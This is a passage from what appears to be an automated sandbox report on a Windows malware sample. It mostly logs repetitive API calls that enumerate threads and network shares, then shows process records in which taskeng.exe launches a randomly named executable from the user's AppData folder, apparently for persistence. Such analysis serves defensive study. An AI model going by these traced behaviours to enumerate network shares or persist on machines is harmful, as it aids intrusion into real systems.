hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.760] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.761] GetTickCount () returned 0x1172661 [0175.761] GetCurrentThreadId () returned 0xab0 [0175.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.761] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.762] GetTickCount () returned 0x1172661 [0175.762] GetCurrentThreadId () returned 0xab0 [0175.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.762] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.763] GetTickCount () returned 0x1172661 [0175.763] GetCurrentThreadId () returned 0xab0 [0175.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.763] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.764] GetTickCount () returned 0x1172661 [0175.764] GetCurrentThreadId () returned 0xab0 [0175.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.764] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.765] GetTickCount () returned 0x1172661 [0175.765] GetCurrentThreadId () returned 0xab0 [0175.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.765] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.766] GetTickCount () returned 0x1172661 [0175.766] GetCurrentThreadId () returned 0xab0 [0175.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.766] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.767] GetTickCount () returned 0x1172661 [0175.767] GetCurrentThreadId () returned 0xab0 [0175.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.767] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.768] GetTickCount () returned 0x1172661 [0175.768] GetCurrentThreadId () returned 0xab0 [0175.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.768] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.769] GetTickCount () returned 0x1172670 [0175.769] GetCurrentThreadId () returned 0xab0 [0175.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.769] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.770] GetTickCount () returned 0x1172670 [0175.770] GetCurrentThreadId () returned 0xab0 [0175.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.770] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.771] GetTickCount () returned 0x1172670 [0175.771] GetCurrentThreadId () returned 0xab0 [0175.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.772] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.772] GetTickCount () returned 0x1172670 [0175.772] GetCurrentThreadId () returned 0xab0 [0175.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.773] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.773] GetTickCount () returned 0x1172670 [0175.773] GetCurrentThreadId () returned 0xab0 [0175.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.774] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.774] GetTickCount () returned 0x1172670 [0175.774] GetCurrentThreadId () returned 0xab0 [0175.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.775] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.776] GetTickCount () returned 0x1172670 [0175.776] GetCurrentThreadId () returned 0xab0 [0175.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.776] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.777] GetTickCount () returned 0x1172670 [0175.777] GetCurrentThreadId () returned 0xab0 [0175.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.777] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.778] GetTickCount () returned 0x1172670 [0175.778] GetCurrentThreadId () returned 0xab0 [0175.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.778] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.779] GetTickCount () returned 0x1172670 [0175.779] GetCurrentThreadId () returned 0xab0 [0175.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.779] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.780] GetTickCount () returned 0x1172670 [0175.780] GetCurrentThreadId () returned 0xab0 [0175.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.780] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.781] GetTickCount () returned 0x1172670 [0175.781] GetCurrentThreadId () returned 0xab0 [0175.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.781] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.782] GetTickCount () returned 0x1172670 [0175.782] GetCurrentThreadId () returned 0xab0 [0175.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.782] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.783] GetTickCount () returned 0x1172670 [0175.783] GetCurrentThreadId () returned 0xab0 [0175.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.783] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.783] GetTickCount () returned 0x1172670 [0175.783] GetCurrentThreadId () returned 0xab0 [0175.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.784] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.785] GetTickCount () returned 0x1172680 [0175.785] GetCurrentThreadId () returned 0xab0 [0175.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.785] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.786] GetTickCount () returned 0x1172680 [0175.786] GetCurrentThreadId () returned 0xab0 [0175.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.786] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.787] GetTickCount () returned 0x1172680 [0175.787] GetCurrentThreadId () returned 0xab0 [0175.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.787] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.788] GetTickCount () returned 0x1172680 [0175.788] GetCurrentThreadId () returned 0xab0 [0175.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.788] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.789] GetTickCount () returned 0x1172680 [0175.789] GetCurrentThreadId () returned 0xab0 [0175.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.789] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.790] GetTickCount () returned 0x1172680 [0175.790] GetCurrentThreadId () returned 0xab0 [0175.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.790] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.791] GetTickCount () returned 0x1172680 [0175.791] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.792] GetTickCount () returned 0x1172680 [0175.793] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.794] GetTickCount () returned 0x1172680 [0175.794] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.795] GetTickCount () returned 0x1172680 [0175.795] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.796] GetTickCount () returned 0x1172680 [0175.796] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.797] GetTickCount () returned 0x1172680 [0175.797] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.798] GetTickCount () returned 0x1172680 [0175.798] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.799] GetTickCount () returned 0x1172680 [0175.799] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.800] GetTickCount () returned 0x1172690 [0175.800] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.801] GetTickCount () returned 0x1172690 [0175.801] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.802] GetTickCount () returned 0x1172690 [0175.802] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.803] GetTickCount () returned 0x1172690 [0175.803] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.804] GetTickCount () returned 0x1172690 [0175.804] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.805] GetTickCount () returned 0x1172690 [0175.805] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.806] GetTickCount () returned 0x1172690 [0175.806] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.807] GetTickCount () returned 0x1172690 [0175.807] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.808] GetTickCount () returned 0x1172690 [0175.808] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.809] GetTickCount () returned 0x1172690 [0175.809] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.810] GetTickCount () returned 0x1172690 [0175.810] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.811] GetTickCount () returned 0x1172690 [0175.811] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.812] GetTickCount () returned 0x1172690 [0175.812] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.813] GetTickCount () returned 0x1172690 [0175.813] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.814] GetTickCount () returned 0x1172690 [0175.814] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.815] GetTickCount () returned 0x117269f [0175.816] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.817] GetTickCount () returned 0x117269f [0175.817] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.818] GetTickCount () returned 0x117269f [0175.818] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.819] GetTickCount () returned 0x117269f [0175.819] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.820] GetTickCount () returned 0x117269f [0175.820] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.821] GetTickCount () returned 0x117269f [0175.821] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.845] GetTickCount () returned 0x11726af [0175.845] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.846] GetTickCount () returned 0x11726af [0175.846] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.847] GetTickCount () returned 0x11726be [0175.847] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.848] GetTickCount () returned 0x11726be [0175.848] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.849] GetTickCount () returned 0x11726be [0175.849] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.850] GetTickCount () returned 0x11726be [0175.850] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.851] GetTickCount () returned 0x11726be [0175.851] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.852] GetTickCount () returned 0x11726be [0175.852] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.853] GetTickCount () returned 0x11726be [0175.853] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.854] GetTickCount () returned 0x11726be [0175.854] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.855] GetTickCount () returned 0x11726be [0175.855] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.856] GetTickCount () returned 0x11726be [0175.856] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.857] GetTickCount () returned 0x11726be [0175.857] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.858] GetTickCount () returned 0x11726be [0175.858] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.859] GetTickCount () returned 0x11726be [0175.859] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.860] GetTickCount () returned 0x11726be [0175.860] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.861] GetTickCount () returned 0x11726be [0175.861] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.862] GetTickCount () returned 0x11726be [0175.862] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.863] GetTickCount () returned 0x11726ce [0175.863] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.864] GetTickCount () returned 0x11726ce [0175.864] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.864] GetTickCount () returned 0x11726ce [0175.865] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.865] GetTickCount () returned 0x11726ce [0175.865] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.866] GetTickCount () returned 0x11726ce [0175.866] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.867] GetTickCount () returned 0x11726ce [0175.867] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.869] GetTickCount () returned 0x11726ce [0175.869] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.870] GetTickCount () returned 0x11726ce [0175.870] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.870] GetTickCount () returned 0x11726ce [0175.870] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.871] GetTickCount () returned 0x11726ce [0175.871] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.872] GetTickCount () returned 0x11726ce [0175.872] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.873] GetTickCount () returned 0x11726ce [0175.873] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.874] GetTickCount () returned 0x11726ce [0175.874] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.875] GetTickCount () returned 0x11726ce [0175.875] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.875] GetTickCount () returned 0x11726ce [0175.876] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.877] GetTickCount () returned 0x11726ce [0175.877] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.878] GetTickCount () returned 0x11726de [0175.878] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.879] GetTickCount () returned 0x11726de [0175.879] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.879] GetTickCount () returned 0x11726de [0175.880] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.880] GetTickCount () returned 0x11726de [0175.881] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.881] GetTickCount () returned 0x11726de [0175.881] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.882] GetTickCount () returned 0x11726de [0175.882] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.883] GetTickCount () returned 0x11726de [0175.883] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.884] GetTickCount () returned 0x11726de [0175.884] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.885] GetTickCount () returned 0x11726de [0175.885] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.886] GetTickCount () returned 0x11726de [0175.886] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.887] GetTickCount () returned 0x11726de [0175.887] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.888] GetTickCount () returned 0x11726de [0175.888] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.889] GetTickCount () returned 0x11726de [0175.889] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.890] GetTickCount () returned 0x11726de [0175.890] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.891] GetTickCount () returned 0x11726de [0175.891] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.891] GetTickCount () returned 0x11726de [0175.892] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.892] GetTickCount () returned 0x11726de [0175.892] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.894] GetTickCount () returned 0x11726ed [0175.894] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.895] GetTickCount () returned 0x11726ed [0175.895] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.896] GetTickCount () returned 0x11726ed [0175.896] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.897] GetTickCount () returned 0x11726ed [0175.897] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.898] GetTickCount () returned 0x11726ed [0175.898] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.899] GetTickCount () returned 0x11726ed [0175.899] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.900] GetTickCount () returned 0x11726ed [0175.900] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.900] GetTickCount () returned 0x11726ed [0175.901] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.901] GetTickCount () returned 0x11726ed [0175.901] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.903] GetTickCount () returned 0x11726ed [0175.903] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.904] GetTickCount () returned 0x11726ed [0175.904] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.905] GetTickCount () returned 0x11726ed [0175.905] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.906] GetTickCount () returned 0x11726ed [0175.906] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.907] GetTickCount () returned 0x11726ed [0175.907] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.908] GetTickCount () returned 0x11726ed [0175.908] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.909] GetTickCount () returned 0x11726fd [0175.909] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.910] GetTickCount () returned 0x11726fd [0175.910] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.911] GetTickCount () returned 0x11726fd Thread: id = 105 os_tid = 0xaa4 [0160.791] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0xa27fee0 | out: lphEnum=0xa27fee0*=0x3577600) returned 0x0 [0162.821] WNetEnumResourceW (in: hEnum=0x3577600, lpcCount=0xa27fedc, lpBuffer=0x3a99830, lpBufferSize=0xa27fed8 | out: lpcCount=0xa27fedc, lpBuffer=0x3a99830, lpBufferSize=0xa27fed8) returned 0x0 [0162.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9d850 [0162.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9d898 [0162.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x353fc28 [0162.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9d8e0 [0162.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9d928 [0162.821] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3a99830, lphEnum=0xa27fe28 | out: lphEnum=0xa27fe28*=0x2e6158) returned 0x0 [0164.111] WNetEnumResourceW (in: hEnum=0x2e6158, lpcCount=0xa27fe24, lpBuffer=0x3abdb08, lpBufferSize=0xa27fe20 | out: lpcCount=0xa27fe24, lpBuffer=0x3abdb08, lpBufferSize=0xa27fe20) returned 0x103 [0164.111] WNetCloseEnum (hEnum=0x2e6158) returned 0x0 [0164.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9d898 | out: hHeap=0x2c0000) returned 1 [0164.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9d850 | out: hHeap=0x2c0000) returned 1 [0164.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9d850 [0164.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9d898 [0164.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x39f9790 [0164.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9de80 [0164.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9dda8 [0164.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9d928 | out: hHeap=0x2c0000) returned 1 [0164.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9d8e0 | out: hHeap=0x2c0000) returned 1 [0164.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353fc28 | out: hHeap=0x2c0000) returned 1 [0164.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9d8e0 [0164.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9d928 [0164.111] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3a99850, lphEnum=0xa27fe28) Thread: id = 114 os_tid = 0x364 Process: id = "7" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x39903000" os_pid = "0xa64" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x370" cmd_line = "taskeng.exe {11D43968-93C2-48E6-BDCD-F8F98A1D0123} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 92 os_tid = 0x888 Thread: id = 93 os_tid = 0x54c Thread: id = 94 os_tid = 0x910 Thread: id = 95 os_tid = 0x8c8 Thread: id = 96 os_tid = 0xa1c Thread: id = 97 os_tid = 0x570 Thread: id = 98 os_tid = 0x8ec Process: id = "8" image_name = "onb5h0yx46mrevq4.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\onb5h0yx46mrevq4.exe" page_root = "0x3aba8000" os_pid = "0x900" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xa64" cmd_line = 